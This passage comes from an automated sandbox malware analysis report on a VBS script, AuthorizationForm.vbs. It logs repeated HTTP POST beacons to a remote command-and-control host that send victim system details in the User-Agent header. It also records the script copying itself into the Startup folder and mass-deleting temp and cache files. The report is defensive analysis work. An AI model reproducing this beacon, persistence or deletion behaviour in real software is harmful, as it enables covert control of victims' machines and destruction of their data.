Timestamp Source IP Dest IP Trans ID OP Code Name Type Class Jan 17, 2018 20:26:31.234621048 CET 192.168.2.2 8.8.8.8 0xc2a9 Standard query shkis.publ A (IP address) IN (0x0001) (0) icvm.com
DNS Answers
Timestamp Source IP Dest IP Trans ID Replay Code Name CName Address Type Class Jan 17, 2018 8.8.8.8 192.168.2.2 0xc2a9 No error (0) shkis.publ 141.255.146.245 A (IP address) IN (0x0001) 20:26:31.572985888 icvm.com CET
HTTP Request Dependency Graph
shkis.publicvm.com:83
HTTP Packets
Session ID Source IP Source Port Destination IP Destination Port Process 0 192.168.2.2 49164 141.255.146.245 83 C:\Windows\System32\wscript.exe
kBytes Timestamp transferred Direction Data Jan 17, 2018 0 OUT POST /is-ready HTTP/1.1 20:26:32.173907995 CET Accept: */* Accept-Language: en-US User-Agent: 5F155A24 | MeoIT<|>computer<|>user<|>Microsoft Windows 7 Professional <|>plus<|>None AV<|>false - 1/17/2018 Accept-Encoding: gzip, deflate Host: shkis.publicvm.com:83 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache
Session ID Source IP Source Port Destination IP Destination Port Process 1 192.168.2.2 49165 141.255.146.245 83 C:\Windows\System32\wscript.exe
kBytes Timestamp transferred Direction Data Jan 17, 2018 1 OUT POST /is-ready HTTP/1.1 20:28:49.204526901 CET Accept: */* Accept-Language: en-US User-Agent: 5F155A24 | MeoIT<|>computer<|>user<|>Microsoft Windows 7 Professional <|>plus<|>None AV<|>false - 1/17/2018 Accept-Encoding: gzip, deflate Host: shkis.publicvm.com:83 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache
Session ID Source IP Source Port Destination IP Destination Port Process 10 192.168.2.2 49174 141.255.146.245 83 C:\Windows\System32\wscript.exe
kBytes Timestamp transferred Direction Data Jan 17, 2018 8 OUT POST /is-ready HTTP/1.1 20:34:14.583149910 CET Accept: */* Accept-Language: en-US User-Agent: 5F155A24 | MeoIT<|>computer<|>user<|>Microsoft Windows 7 Professional <|>plus<|>None AV<|>false - 1/17/2018 Accept-Encoding: gzip, deflate Host: shkis.publicvm.com:83 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache
Copyright Joe Security LLC 2018 Page 16 of 30 Session ID Source IP Source Port Destination IP Destination Port Process 11 192.168.2.2 49175 141.255.146.245 83 C:\Windows\System32\wscript.exe
kBytes Timestamp transferred Direction Data Jan 17, 2018 9 OUT POST /is-ready HTTP/1.1 20:34:27.979749918 CET Accept: */* Accept-Language: en-US User-Agent: 5F155A24 | MeoIT<|>computer<|>user<|>Microsoft Windows 7 Professional <|>plus<|>None AV<|>false - 1/17/2018 Accept-Encoding: gzip, deflate Host: shkis.publicvm.com:83 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache
Session ID Source IP Source Port Destination IP Destination Port Process 12 192.168.2.2 49176 141.255.146.245 83 C:\Windows\System32\wscript.exe
kBytes Timestamp transferred Direction Data Jan 17, 2018 10 OUT POST /is-ready HTTP/1.1 20:34:41.336472034 CET Accept: */* Accept-Language: en-US User-Agent: 5F155A24 | MeoIT<|>computer<|>user<|>Microsoft Windows 7 Professional <|>plus<|>None AV<|>false - 1/17/2018 Accept-Encoding: gzip, deflate Host: shkis.publicvm.com:83 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache
Session ID Source IP Source Port Destination IP Destination Port Process 13 192.168.2.2 49177 141.255.146.245 83 C:\Windows\System32\wscript.exe
kBytes Timestamp transferred Direction Data Jan 17, 2018 11 OUT POST /is-ready HTTP/1.1 20:34:54.392508984 CET Accept: */* Accept-Language: en-US User-Agent: 5F155A24 | MeoIT<|>computer<|>user<|>Microsoft Windows 7 Professional <|>plus<|>None AV<|>false - 1/17/2018 Accept-Encoding: gzip, deflate Host: shkis.publicvm.com:83 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache
Session ID Source IP Source Port Destination IP Destination Port Process 2 192.168.2.2 49166 141.255.146.245 83 C:\Windows\System32\wscript.exe
kBytes Timestamp transferred Direction Data Jan 17, 2018 2 OUT POST /is-ready HTTP/1.1 20:31:04.239506006 CET Accept: */* Accept-Language: en-US User-Agent: 5F155A24 | MeoIT<|>computer<|>user<|>Microsoft Windows 7 Professional <|>plus<|>None AV<|>false - 1/17/2018 Accept-Encoding: gzip, deflate Host: shkis.publicvm.com:83 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache
Session ID Source IP Source Port Destination IP Destination Port Process 3 192.168.2.2 49167 141.255.146.245 83 C:\Windows\System32\wscript.exe
kBytes Timestamp transferred Direction Data
Copyright Joe Security LLC 2018 Page 17 of 30 kBytes Timestamp transferred Direction Data Jan 17, 2018 3 OUT POST /is-ready HTTP/1.1 20:32:40.879215956 CET Accept: */* Accept-Language: en-US User-Agent: 5F155A24 | MeoIT<|>computer<|>user<|>Microsoft Windows 7 Professional <|>plus<|>None AV<|>false - 1/17/2018 Accept-Encoding: gzip, deflate Host: shkis.publicvm.com:83 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache
Session ID Source IP Source Port Destination IP Destination Port Process 4 192.168.2.2 49168 141.255.146.245 83 C:\Windows\System32\wscript.exe
kBytes Timestamp transferred Direction Data Jan 17, 2018 3 OUT POST /is-ready HTTP/1.1 20:32:54.107383013 CET Accept: */* Accept-Language: en-US User-Agent: 5F155A24 | MeoIT<|>computer<|>user<|>Microsoft Windows 7 Professional <|>plus<|>None AV<|>false - 1/17/2018 Accept-Encoding: gzip, deflate Host: shkis.publicvm.com:83 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache
Session ID Source IP Source Port Destination IP Destination Port Process 5 192.168.2.2 49169 141.255.146.245 83 C:\Windows\System32\wscript.exe
kBytes Timestamp transferred Direction Data Jan 17, 2018 4 OUT POST /is-ready HTTP/1.1 20:33:07.531547070 CET Accept: */* Accept-Language: en-US User-Agent: 5F155A24 | MeoIT<|>computer<|>user<|>Microsoft Windows 7 Professional <|>plus<|>None AV<|>false - 1/17/2018 Accept-Encoding: gzip, deflate Host: shkis.publicvm.com:83 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache
Session ID Source IP Source Port Destination IP Destination Port Process 6 192.168.2.2 49170 141.255.146.245 83 C:\Windows\System32\wscript.exe
kBytes Timestamp transferred Direction Data Jan 17, 2018 5 OUT POST /is-ready HTTP/1.1 20:33:21.001354933 CET Accept: */* Accept-Language: en-US User-Agent: 5F155A24 | MeoIT<|>computer<|>user<|>Microsoft Windows 7 Professional <|>plus<|>None AV<|>false - 1/17/2018 Accept-Encoding: gzip, deflate Host: shkis.publicvm.com:83 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache
Session ID Source IP Source Port Destination IP Destination Port Process 7 192.168.2.2 49171 141.255.146.245 83 C:\Windows\System32\wscript.exe
kBytes Timestamp transferred Direction Data
Copyright Joe Security LLC 2018 Page 18 of 30 kBytes Timestamp transferred Direction Data Jan 17, 2018 6 OUT POST /is-ready HTTP/1.1 20:33:34.377418041 CET Accept: */* Accept-Language: en-US User-Agent: 5F155A24 | MeoIT<|>computer<|>user<|>Microsoft Windows 7 Professional <|>plus<|>None AV<|>false - 1/17/2018 Accept-Encoding: gzip, deflate Host: shkis.publicvm.com:83 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache
Session ID Source IP Source Port Destination IP Destination Port Process 8 192.168.2.2 49172 141.255.146.245 83 C:\Windows\System32\wscript.exe
kBytes Timestamp transferred Direction Data Jan 17, 2018 7 OUT POST /is-ready HTTP/1.1 20:33:47.679172039 CET Accept: */* Accept-Language: en-US User-Agent: 5F155A24 | MeoIT<|>computer<|>user<|>Microsoft Windows 7 Professional <|>plus<|>None AV<|>false - 1/17/2018 Accept-Encoding: gzip, deflate Host: shkis.publicvm.com:83 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache
Session ID Source IP Source Port Destination IP Destination Port Process 9 192.168.2.2 49173 141.255.146.245 83 C:\Windows\System32\wscript.exe
kBytes Timestamp transferred Direction Data Jan 17, 2018 8 OUT POST /is-ready HTTP/1.1 20:34:01.086682081 CET Accept: */* Accept-Language: en-US User-Agent: 5F155A24 | MeoIT<|>computer<|>user<|>Microsoft Windows 7 Professional <|>plus<|>None AV<|>false - 1/17/2018 Accept-Encoding: gzip, deflate Host: shkis.publicvm.com:83 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache
Code Manipulations
Statistics
Behavior
• wscript.exe • explorer.exe • explorer.exe • explorer.exe • explorer.exe • explorer.exe • explorer.exe • wscript.exe
Copyright Joe Security LLC 2018 Page 19 of 30 Click to jump to process
System Behavior
Analysis Process: wscript.exe PID: 3100 Parent PID: 2852
General
Start time: 20:26:16 Start date: 17/01/2018 Path: C:\Windows\System32\wscript.exe Wow64 process (32bit): false Commandline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\Desktop\AuthorizationForm.vbs' Imagebase: 0x6c5d0000 File size: 141824 bytes MD5 hash: 979D74799EA6C8B8167869A68DF5204A Programmed in: C, C++ or other language Reputation: moderate
File Activities
File Created
Source File Path Access Attributes Options Completion Count Address Symbol C:\Users\user\AppData\Roaming\AuthorizationForm.vbs read data or list archive sequential only success or wait 1 6F309434 CopyFileW directory and and non direct read attributes ory file and delete and synchronize and generic write C:\Users\user\AppData\Roaming\AuthorizationForm.vbs\:Zone.Id read data or list none sequential only success or wait 1 6F309434 CopyFileW entifier:$DATA directory and and synchronou synchronize and s io non alert generic write C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\P read data or list archive sequential only success or wait 1 6F309434 CopyFileW rograms\Startup\AuthorizationForm.vbs directory and and synchronou read attributes s io non alert and delete and and non directo synchronize and ry file generic write C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\P read data or list none sequential only success or wait 1 6F309434 CopyFileW rograms\Startup\AuthorizationForm.vbs\:Zone.Identifier:$DATA directory and and synchronou synchronize and s io non alert generic write C:\Users\user\AppData\Local\Temp\Luu_Tam_Nhe read data or list normal directory file and success or wait 1 6F2F47C8 CreateDirectoryW directory and synchronous io synchronize non alert and open for backup ident and open reparse point
Copyright Joe Security LLC 2018 Page 20 of 30 File Deleted
Source File Path Completion Count Address Symbol C:\Users\user\AppData\Local\Temp\AdobeSFX.log success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Temp\chrome_installer.log success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Temp\clientsharedmui-en-us_MSPLOG.LOG success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Temp\dd_vcredist_x86_20170807200428.log success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Temp\dd_vcredist_x86_20170807200428_000_vcRuntimeMinimum_x86.log success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Temp\dd_vcredist_x86_20170807200428_001_vcRuntimeAdditional_x86.log success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Temp\dd_vcredist_x86_20170807200522.log success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Temp\dd_vcredist_x86_20170807200522_0_vcRuntimeMinimum_x86.log success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Temp\dd_vcredist_x86_20170807200522_1_vcRuntimeAdditional_x86.log success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Temp\dd_vcredist_x86_20170807200642.log success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Temp\dd_vcredist_x86_20170807200642_0_vcRuntimeMinimum_x86.log success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Temp\dd_vcredist_x86_20170807200642_1_vcRuntimeAdditional_x86.log success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Temp\user.bmp success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Temp\JavaDeployReg.log success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Temp\java_install_sp.log success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Temp\jawshtml.html success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Temp\jusched.log success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Temp\Microsoft Visual C++ 2010 x86 Redistributable Setup_20170807_200735171-MSI_vc_red.msi. success or wait 1 6F309346 DeleteFileW txt C:\Users\user\AppData\Local\Temp\Microsoft Visual C++ 2010 x86 Redistributable Setup_20170807_200735171.html success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Temp\officesuitemui-en-us_MSPLOG.LOG success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Temp\officesuiteww-x-none_MSPLOG.LOG success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Temp\opatchinstall(1).log success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Temp\proof-en-us_MSPLOG.LOG success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Temp\proof-es-es_MSPLOG.LOG success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Temp\proof-fr-fr_MSPLOG.LOG success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Temp\proofing-en-us_MSPLOG.LOG success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Temp\SetupExe(201708072012233B8).log success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Temp\wmsetup.log success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Temp\{18F5A621-73B7-4C32-96D7-2C339FD9E9B7}-60.0.3112.113_60.0 success or wait 1 6F309346 DeleteFileW .3112.90_chrome_updater.exe C:\Users\user\AppData\Local\Temp\Adobe_ADMLogs\Adobe_ADM.log success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Temp\Adobe_ADMLogs\Adobe_GDE.log success or wait 1 6F309346 DeleteFileW C:\Windows\Temp\ASPNETSetup_00000.log success or wait 1 6F309346 DeleteFileW C:\Windows\Temp\dd_ndp46-kb4024848-x86_decompression_log.txt success or wait 1 6F309346 DeleteFileW C:\Windows\Temp\dd_wcf_CA_smci_20170807_130930_358.txt success or wait 1 6F309346 DeleteFileW C:\Windows\Temp\DMI9059.tmp success or wait 1 6F309346 DeleteFileW C:\Windows\Temp\fwtsqmfile00.sqm success or wait 1 6F309346 DeleteFileW C:\Windows\Temp\KB4024848_20170807_150919192-Microsoft .NET Framework 4.7-MSP0.txt success or wait 1 6F309346 DeleteFileW C:\Windows\Temp\KB4024848_20170807_150919192.html success or wait 1 6F309346 DeleteFileW C:\Windows\Temp\MpCmdRun.log success or wait 1 6F309346 DeleteFileW C:\Windows\Temp\MpSigStub.log success or wait 1 6F309346 DeleteFileW C:\Windows\Temp\RGI3F19.tmp success or wait 1 6F309346 DeleteFileW C:\Windows\Temp\RGI3F19.tmp-tmp success or wait 1 6F309346 DeleteFileW C:\Windows\Temp\TS_40F9.tmp success or wait 1 6F309346 DeleteFileW C:\Windows\Temp\TS_4929.tmp success or wait 1 6F309346 DeleteFileW C:\Windows\Temp\TS_7FC5.tmp success or wait 1 6F309346 DeleteFileW C:\Windows\Temp\TS_ED88.tmp success or wait 1 6F309346 DeleteFileW C:\Windows\Temp\TS_EEDD.tmp success or wait 1 6F309346 DeleteFileW C:\Windows\Temp\TS_EF57.tmp success or wait 1 6F309346 DeleteFileW C:\Windows\Temp\TS_F07A.tmp success or wait 1 6F309346 DeleteFileW C:\Windows\Temp\TS_F1C5.tmp success or wait 1 6F309346 DeleteFileW C:\Windows\Temp\TS_F37F.tmp success or wait 1 6F309346 DeleteFileW C:\Windows\Temp\TS_F3D0.tmp success or wait 1 6F309346 DeleteFileW C:\Windows\Temp\TS_F59E.tmp success or wait 1 6F309346 DeleteFileW C:\Windows\Temp\TS_F60D.tmp success or wait 1 6F309346 DeleteFileW C:\Windows\Temp\Crashpad\metadata success or wait 1 6F309346 DeleteFileW C:\Windows\Temp\Crashpad\settings.dat success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0316J1PS\160[1] success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0316J1PS\common[1] success or wait 1 6F309346 DeleteFileW
Copyright Joe Security LLC 2018 Page 21 of 30 Source File Path Completion Count Address Symbol C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0316J1PS\common[2] success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0316J1PS\favicon[1].png success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0316J1PS\favicon[2].png success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0316J1PS\host[1] success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0316J1PS\known_providers_download_v1[ success or wait 1 6F309346 DeleteFileW 1].xml C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0316J1PS\progress_bg_fill[1] success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0316J1PS\progress_bg_left[1] success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0316J1PS\progress_fg_right[1] success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0316J1PS\runtime[1] success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0316J1PS\SC[1] success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0316J1PS\welcome[1] success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0TZNT9WD\favicon[1].ico success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0TZNT9WD\layout[1] success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0TZNT9WD\layout[2] success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0TZNT9WD\masthead_fill[1] success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0TZNT9WD\masthead_fill[2] success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0TZNT9WD\progress[1] success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0TZNT9WD\progress_en[1] success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0TZNT9WD\progress_fg_left[1] success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0TZNT9WD\urlblockindex[1].bin success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0TZNT9WD\welcome[1] success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\77PTX9DT\160[1] success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\77PTX9DT\check[1] success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\77PTX9DT\complete[1] success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\77PTX9DT\favicon[2].ico success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\77PTX9DT\host[1] success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\77PTX9DT\progress_fg_fill[1] success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\77PTX9DT\rtutils[1] success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\77PTX9DT\rtutils[2] success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\77PTX9DT\runtime[1] success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\77PTX9DT\urlblocklist[1].bin success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\77PTX9DT\welcome_en[1] success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\container.dat success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DEWWYACU\complete_en[1] success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DEWWYACU\favicon[1].ico success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DEWWYACU\favicon[1].png success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DEWWYACU\Java3BillDevices_EN[1] success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DEWWYACU\l10n[1] success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DEWWYACU\l10n[2] success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DEWWYACU\masthead_left[1] success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DEWWYACU\masthead_left[2] success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DEWWYACU\progress_bg_right[1] success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DEWWYACU\SC[1] success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DEWWYACU\welcome_en[1] success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\FVVY4ARZ\desktop.ini success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\FVVY4AR success or wait 1 6F309346 DeleteFileW Z\Firefox%20Setup%20Stub%2054.0.1[1].exe C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\J384NTPU\desktop.ini success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\J384NTPU\favicon[1].png success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JF2I8VH2\desktop.ini success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JF2I8VH2\favicon.dc6635050bf5[1].ico success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NJ1ASBJ0\desktop.ini success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NJ1ASBJ0\favicon[1].png success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\AntiPhishing\4A72F430-B40C-4D36-A068- success or wait 1 6F309346 DeleteFileW CE33ADA5ADF9.dat C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1SNL0OFP\17k[1].gif success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1SNL0OFP\52-7e5bc3-f30905ea[1] success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1SNL0OFP\5e-ef63ca-91cdfbc1[1].txt success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1SNL0OFP\AAfOIDq[1].png success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1SNL0OFP\AApASM9[1].jpg success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1SNL0OFP\AApAWS2[1].jpg success or wait 1 6F309346 DeleteFileW
Copyright Joe Security LLC 2018 Page 22 of 30 Source File Path Completion Count Address Symbol C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1SNL0OFP\AApAxXv[1].jpg success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1SNL0OFP\AApwV1G[1].jpg success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1SNL0OFP\AApykUk[1].jpg success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1SNL0OFP\bs-components[1].css success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1SNL0OFP\btn-app-store.1cfd5dba4a success or wait 1 6F309346 DeleteFileW 92[1].svg C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1SNL0OFP\common- success or wait 1 6F309346 DeleteFileW bundle.8e106b1b72c3[1].js C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1SNL0OFP\desktop.ini success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1SN success or wait 1 6F309346 DeleteFileW L0OFP\Firefox%20Setup%20Stub%2054.0.1[1].exe C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1SNL0OFP\firefox_new_scene1-bundl success or wait 1 6F309346 DeleteFileW e.a59db094c561[1].js C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1SNL0OFP\gtm-snippet-bundle.e9560 success or wait 1 6F309346 DeleteFileW 15fe7f3[1].js C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1SNL0OFP\latest[1].eot success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1SNL0OFP\linkid[1].js success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1SNL0OFP\meversion[1] success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1SNL0OFP\moz-wordmark-light-rever success or wait 1 6F309346 DeleteFileW se.cb1bdf6d1de6[1].svg C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1SNL0OFP\new[1].htm success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1SNL0OFP\search[1].htm success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1SNL0OFP\site-bundle.5f2462a3ca26 success or wait 1 6F309346 DeleteFileW [1].js C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1SNL0OFP\stars.8398dac91f60[1].svg success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1SNL0OFP\trans[1].gif success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1SNL0OFP\wc-addons[1].css success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\BX7UEHQ0\7962161087[1].js success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\BX7UEHQ0\AA61yi9[1].png success or wait 1 6F309346 DeleteFileW 